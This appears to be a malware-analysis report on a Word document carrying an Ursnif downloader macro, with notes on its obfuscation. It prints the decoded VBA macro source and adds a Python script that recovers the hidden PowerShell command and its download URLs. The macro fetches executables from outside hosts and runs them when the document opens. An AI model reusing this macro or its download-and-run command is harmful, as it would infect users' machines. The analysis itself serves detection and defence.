Verdict: MALICIOUS
Risk score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros with a Document_open handler, so the code runs as soon as the document is opened with macros enabled; the handler is wrapped in On Error Resume Next so that any runtime error is silently swallowed. Its only real statement is a hidden (vbHide) Shell() call whose argument is assembled from dozens of short string fragments returned by two helper functions, which is why the Shell() heuristic fires at critical. The ClamAV signature Doc.Downloader.URSNIF-6729855-3 classifies the document as an Ursnif downloader. The assembled string is a cmd.exe command line obfuscated in three layers: letters such as 'c' are produced by Chr() arithmetic (Chr(11 + 4 + 11 + 0 + 73) is Chr(99)), caret characters that cmd.exe strips at parse time are scattered through every fragment, and the /V:O switch enables delayed variable expansion so that a value stored with set dR36=... can later be re-read character by character. Read backwards, the fragments spell PowerShell: a list of http:// URLs joined with '@' and separated with .Split('@'), a target path built from $env:public, and a foreach loop that calls .DownloadFile() on each URL, runs the saved .exe with Invoke-Item and breaks after the first success. The repeated calls to Second with random-looking arguments are filler between the real statements; Second is not defined in the visible part of the macro. Because the URLs only exist after caret stripping and reversal, plain string extraction from the document does not surface them, and the one URL the extractor did find (the DrawingML schema namespace) is benign.
Heuristics (5)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace URI carried by any Office document that contains drawing markup; it is not a network indicator. The download URLs used by the macro are built at runtime from obfuscated fragments and do not appear here.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5666 bytes | 2b343f0198bcbdfd25ce93fe6707d46a4f4117b197646d614d3c797ac7ae0721 |
Preview of the extracted script (first 1,000 lines):

```vba
Attribute VB_Name = "NYAmpiqCzPKYmP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Second "381407839" + "wimvADjwjIVv" + "YPESPjnCIpwL" + "CErYFXiN"
Second "423893704" + "S"
Second "Sz" + "4288"
Second "7168" + "294543505" + "6103" + "2862"
Shell YSFcLC + YctmrAvGb + OSVjhwRGiaj, CStr(vbHide)
Second "YrWIZ" + "mUnnopj" + "7396" + "BcE"
End Sub
Attribute VB_Name = "wRbZNlD"
Function YSFcLC()
On _
Error _
Resume _
Next
Second "NqCz" + "HBKFIASZTWw"
Second "jQCZYPswm" + "wjnt" + "tp" + "490722702"
JIXJRLoBMk = Format(Chr(11 + 4 + 11 + 0 + 73)) + "md /" + "V^:^O/" + Format(Chr(8 + 3 + 7 + 0 + 49)) + Format(Chr(3 + 1 + 3 + 0 + 27)) + "^s" + "e^t" + " ^dR^" + "3^6=^" + " ^ " + "^ " + "^ ^ " + "^ " + "^ ^ " + "^ ^}}{^"
Second "L" + "iqWoId" + "4074" + "3927"
Second "476995799" + "SXE" + "pmiWMRzGjIY" + "5856"
Second "6324" + "8010" + "Sju" + "bYNZ"
LHrSVVG = "h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "t^" + "a" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^};^ka^" + "erb;^D" + "^B^u$"
Second "SpwO" + "440879874" + "cGfptrMAO" + "2102"
Second "262" + "100853746" + "bb" + "hjwtdWbC"
WNLkzOl = "^ m^et^" + "I-^" + "e^" + "k^ovn^" + "I^;)" + "D" + "^Bu^$^ " + "^,^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^T$(" + "el^iF" + "d^ao^l" + "nwo^D^" + ".P^"
Second "tck" + "454007359"
Second "SKVn" + "7426" + "q" + "knFtMPCUhEi"
EaVNK = "bt${yr" + "^t{)" + "^" + "F" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^l" + "$^ n" + "i^ " + "^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "T" + "$("
Second "LdHWNTZqX" + "wjn"
Second "25495363" + "hjV" + "kpfAJr" + "Z"
vjuHcBuUUk = "h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "aer" + "o" + "^f;'" + "e" + "^" + "x^" + "e.^'^" + "+" + "iPA" + "^$+^" + "'" + "^"
YSFcLC = JIXJRLoBMk + LHrSVVG + WNLkzOl + EaVNK + vjuHcBuUUk
Second "YiOSW" + "UNwXL"
Second "335611277" + "q"
Second "5701" + "B"
Second "3376" + "aJzRJEPFVEjP" + "2355" + "296082838"
End Function
Function YctmrAvGb()
On _
Error _
Resume _
Next
Second "RV" + "uM" + "MK" + "FSsYTUDS"
Second "KYCPcPBS" + "qkA" + "205758215" + "RkUfjTMz"
Second "Rzbz" + "GOCAImKw"
jtMlmd = "\^'^+" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "i" + "lb^" + "up" + "^:vn^" + "e$" + "^=DB^u" + "^$;" + "^'^5^5" + "^" + "7" + "^' ^= "
Second "qjjF" + "UWkh"
Second "t" + "7677"
PAnXPlKpfuB = "^iPA^$" + "^;" + ")^'@^'" + "(" + "^t^il^p" + "^"
Second "EYbowoWwdcGk" + "436467662"
Second "fKCA" + "1808"
LodMOnwB = "S^.'m^" + "H^q^" + "a^x" + "/m^o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^.yr^a" + "^dan^a" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/:p" + "^tt" + "^" + "h^@^Z" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/^set^"
Second "33551837" + "294342222"
Second "jXj" + "F"
Second "A" + "j" + "1261" + "310740337"
XioIhqbCb = "al^pm" + "e^t" + "/^d" + "^i." + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "a." + "us^u.^b"
Second "zTTkZY" + "8006" + "6910" + "u"
Second "PjLc" + "474210193" + "CQpfHM" + "zoB"
Second "BvETLpw" + "Ckri" + "qtdzNk" + "350115799"
Second "iDEs" + "AHCckjm"
TlKvlKsZSoT = "^" + "if//:p" + "tth@^L" + "^Y/" + "^p^j" + "." + "r^"
Second "29930127" + "SbXUjUpM" + "262251550" + "8009"
Second "Ef" + "pTfi"
Second "WqjAbiDZFR" + "5935"
Second "Qrbz" + "OLb"
Second "O" + "TsH" + "430160037" + "C"
RtpAOs = "e" + "v^er" + "^k" + "//:^p" + "^t^th^"
Second "Q" + "100341861" + "7493" + "oG"
Second "I" + "bCj"
CVhzDZrTNS = "@y^" + "o" + "^M/^m^" + "o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + ".^tro" + "pnev" + "^a^d^e^" + "irra" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/^:p" + "^t" + "t^h@"
Second "jsFDP" + "f" + "55792575" + "4582"
Second "OMw" + "9065" + "jtfh" + "66570442"
Second "qWwz" + "110735629" + "215707093" + "7991"
ErLrPjPj = "^" + "H^" + "l" +
```
... (truncated)
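The deobfuscation described in the summary, as an added worked example written for this page (it is not part of the analyzer's output or of the sample). It takes the string-builder expressions copied verbatim from the preview above, folds the Chr() arithmetic, joins the fragments the way the macro does (the join order of YSFcLC is visible on the page; the join line of YctmrAvGb is cut off, so source order is assumed for it and the truncated ErLrPjPj fragment is left out), applies cmd.exe's caret-escape rule, and reads the value assigned with set dR36= backwards. The reversal step assumes the unseen tail of the command line reverses that variable, which is what the /V:O delayed-expansion switch is there for. Function and constant names are the example's own.

```python
"""Recover the cmd.exe / PowerShell command built by the Document_open macro.

Added example for this report, not analyzer or sample code. The VBA expressions
below are copied from the macro preview; the join order of YctmrAvGb and the
final reversal of the env var are ASSUMED (the macro tail is truncated).
"""
import re

# YSFcLC = JIXJRLoBMk + LHrSVVG + WNLkzOl + EaVNK + vjuHcBuUUk (order shown on the page)
YSFCLC_PARTS = [
    r'''Format(Chr(11 + 4 + 11 + 0 + 73)) + "md /" + "V^:^O/" + Format(Chr(8 + 3 + 7 + 0 + 49))
        + Format(Chr(3 + 1 + 3 + 0 + 27)) + "^s" + "e^t" + " ^dR^" + "3^6=^" + " ^ " + "^ "
        + "^ ^ " + "^ " + "^ ^ " + "^ ^}}{^"''',
    r'''"h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "t^" + "a" + Format(Chr(11 + 4 + 11 + 0 + 73))
        + "^};^ka^" + "erb;^D" + "^B^u$"''',
    r'''"^ m^et^" + "I-^" + "e^" + "k^ovn^" + "I^;)" + "D" + "^Bu^$^ " + "^,^G"
        + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^T$(" + "el^iF" + "d^ao^l" + "nwo^D^" + ".P^"''',
    r'''"bt${yr" + "^t{)" + "^" + "F" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^l" + "$^ n" + "i^ "
        + "^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "T" + "$("''',
    r'''"h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "aer" + "o" + "^f;'" + "e" + "^" + "x^" + "e.^'^"
        + "+" + "iPA" + "^$+^" + "'" + "^"''',
]

# YctmrAvGb pieces in source order (ASSUMED join order; its join line is truncated on the page)
YCTMRAVGB_PARTS = [
    r'''"\^'^+" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "i" + "lb^" + "up" + "^:vn^" + "e$"
        + "^=DB^u" + "^$;" + "^'^5^5" + "^" + "7" + "^' ^= "''',
    r'''"^iPA^$" + "^;" + ")^'@^'" + "(" + "^t^il^p" + "^"''',
    r'''"S^.'m^" + "H^q^" + "a^x" + "/m^o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^.yr^a" + "^dan^a"
        + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/:p" + "^tt" + "^" + "h^@^Z"
        + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/^set^"''',
    r'''"al^pm" + "e^t" + "/^d" + "^i." + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "a." + "us^u.^b"''',
    r'''"^" + "if//:p" + "tth@^L" + "^Y/" + "^p^j" + "." + "r^"''',
    r'''"e" + "v^er" + "^k" + "//:^p" + "^t^th^"''',
    r'''"@y^" + "o" + "^M/^m^" + "o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + ".^tro" + "pnev"
        + "^a^d^e^" + "irra" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/^:p" + "^t" + "t^h@"''',
]

# A VBA string literal, or Format(Chr(a + b + ...)); the '+' operators between tokens are skipped.
TOKEN = re.compile(r'"([^"]*)"|Format\(Chr\(([^)]*)\)\)')


def eval_vba_concat(expr):
    """Fold a VBA expression of literals and Chr() arithmetic into one string."""
    out = []
    for literal, chr_arith in TOKEN.findall(expr):
        if chr_arith:
            out.append(chr(sum(int(n) for n in chr_arith.split("+"))))
        else:
            out.append(literal)
    return "".join(out)


def strip_cmd_carets(s):
    """cmd.exe escape rule: '^' makes the following character literal ('^^' is one '^')."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def build_shell_argument(ysfclc_parts, yctmravgb_parts):
    """Mirror `Shell YSFcLC + YctmrAvGb, CStr(vbHide)` as cmd.exe would see it after parsing."""
    raw = "".join(eval_vba_concat(p) for p in ysfclc_parts + yctmravgb_parts)
    return strip_cmd_carets(raw)


SET_RE = re.compile(r"set (\w+)=(.*)", re.S)


def recover_powershell(cmdline):
    """Return (env var name, its value read backwards); the reversal is the assumed job of the
    truncated /V:O delayed-expansion loop."""
    m = SET_RE.search(cmdline)
    if not m:
        raise ValueError('no "set NAME=" in command line')
    return m.group(1), m.group(2)[::-1].strip()


URL_RE = re.compile(r"https?://[^\s'\"@]+")


def extract_urls(text):
    """Pull the download URLs out of the recovered PowerShell (they are '@'-joined)."""
    return URL_RE.findall(text)


if __name__ == "__main__":
    cmdline = build_shell_argument(YSFCLC_PARTS, YCTMRAVGB_PARTS)
    print(cmdline[:40] + "...")
    var, ps = recover_powershell(cmdline)
    print(var, "=>", ps)
    for url in extract_urls(ps):
        print("IOC:", url)
```

Two layers of the obfuscation (Chr() folding) belong to VBA and a generic VBA deobfuscator handles them; the caret escapes and the env-var reversal are cmd.exe and batch semantics, so a VBA-level tool stops at a string that still looks like noise. The URLs this recovers are the sample's download locations and should be handled as indicators from the sample, not as safe test addresses.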